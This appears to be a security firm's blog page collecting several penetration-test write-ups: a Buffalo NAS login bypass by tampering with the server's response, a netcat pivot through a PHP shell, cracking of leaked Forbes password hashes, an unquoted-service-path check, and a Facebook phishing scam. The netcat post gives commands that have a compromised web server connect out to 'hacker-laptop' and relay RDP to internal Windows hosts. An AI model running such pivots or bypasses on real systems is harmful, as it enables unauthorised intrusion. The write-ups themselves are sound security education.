General Information
During a client penetration test, SecQuest consultants found that it was possible to bypass authentication on Buffalo NAS devices by modifying the response to the login request.

This allows full access at administrator level giving complete control of the device. Using the admin interface it is possible to add a new user and open the device up for remote file sharing via Buffalo's "webaccess" functionality.

This would give access to all data contained on the device. A malicious attacker could alternatively format the storage or delete RAID arrays potentially resulting in data loss.

Vulnerability
The response from a POST request to /dynamic.pl can be modified in a proxy to allow access using ANY username and password by changing the "success" and "pagemode" parameters as follows:

Original response {"success":false,"errors":[],"data":[{"sid":"###","pageMode":2}]}

Wednesday, 4 March 2015

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:

Our hacker is connected to the webserver which we've got a PHP command shell on. We know that there are Windows boxes on the back-end so needed a way to get comms tunnelled through to them. At this point we could use something like Meterpreter but wanted a quick/dirty solution that didn't involve creating files, uploading etc. Fortunaely the system had netcat installed!

So firstly we needed netcat to listen on port 53 (DNS) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command sets up a listener on TCP 53 then relays that connection via anther netcat instance to a local listener on RDP port 3389:

nc -l -p 53 -e nc -l -p 3389

From the PHP command shell we had on the WWW server we then ran the following command:

nc hacker-laptop -p 53 -e nc windows-server -p 3389

This caused the WWW server to create an outbound connection to our laptop which in turn started another listener locally on TCP 3389:

It also created a connection between the WWW server and the Windows server:

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!

Friday, 9 May 2014

In common with the Facebook scam post earlier we don't usually bother blogging about malware and phishing emails as they're usually handled well by companies and are pretty common.. this email was a bit more interesting.

Wednesday, 9 April 2014

Going back a year or two we blogged about Microsoft's SmartScreen filter sending potentially sensitive file information to Microsoft's servers who download files after they've been downloaded by Internet Explorer. If you're putting super-secret-file.zip on a server for someone you probably don't want anyone else coming along and hoovering that up!

We've recently become aware that some versions of Trend antivirus products do exactly the same..

Sunday, 16 February 2014

Did a really quick analysis of the Forbes password hashes leaked by the Syrian Electronic Army earlier. From the 1,071,734 password hashes that hashcat recognised as WordPress, 2713 were cracked in about 30 minutes.

There were no switches, GPUs, rules or anything used.. I just used the unedited top 25 passwords taken from the top 10,000 list published by Mark Burnett (xato.net). -> blog post here

The results show that 975 people have 123456 as a password.. some things never change! Top 25 cracked hashes follow:

In a nutshell this vulnerability is due to some Windows paths for services in the registry not being "enclosed with quotes". Believe it or not but when Windows sees the following: C:\Program Files\Test App\app.exe it tries to run the executable like this:

On the Common Exploits blog Daniel has given us a handy command to check for vulnerable services:C:\>wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

I ran that on a system and got the following results:CorsairSSDTool CorsairSSDToolBox C:\Program Files\Corsair SSD Toolbox\CSSDT Service.exe AutoInternet Pass-Through Service PassThru Service C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe Auto

Metasploit has a privilege escalation module to take
advantage of this but I couldn't find a simple standalone way of showing a proof
of concept for this issue. Taking the easy option and copying cmd.exe to the path fails to execute as it is not a proper
Windows service application, we decided to write our own service to
demo this!

Monday, 9 December 2013

As an infosec company we don't tend to blog about Facebook scams such as "Free £100 Tesco voucher" or "Apple is giving away 1000 iPads because the boxes are scuffed" - surely a new box is cheaper + we'd be here all day tracing them!

However, this one peaked our interest as it is something that could just as well affect a company as an individual. This is pretty much a classic phishing exercise with a bit of social engineering thrown in for good measure, it's quite well executed though so on with the details..

I had a private Facebook message from a family member come through which cc'd a number of other family members/friends. This is what the message looked like (blurred to protect the innocent!):

Alarm bells started ringing; a PM with a generic message along with a URL shortened using "t.co" which is a classic obfuscation technique. The "Facebooky" looking thumbs up adds a certain amount of credibility as it was posted by another family member, surely they can be trusted, right?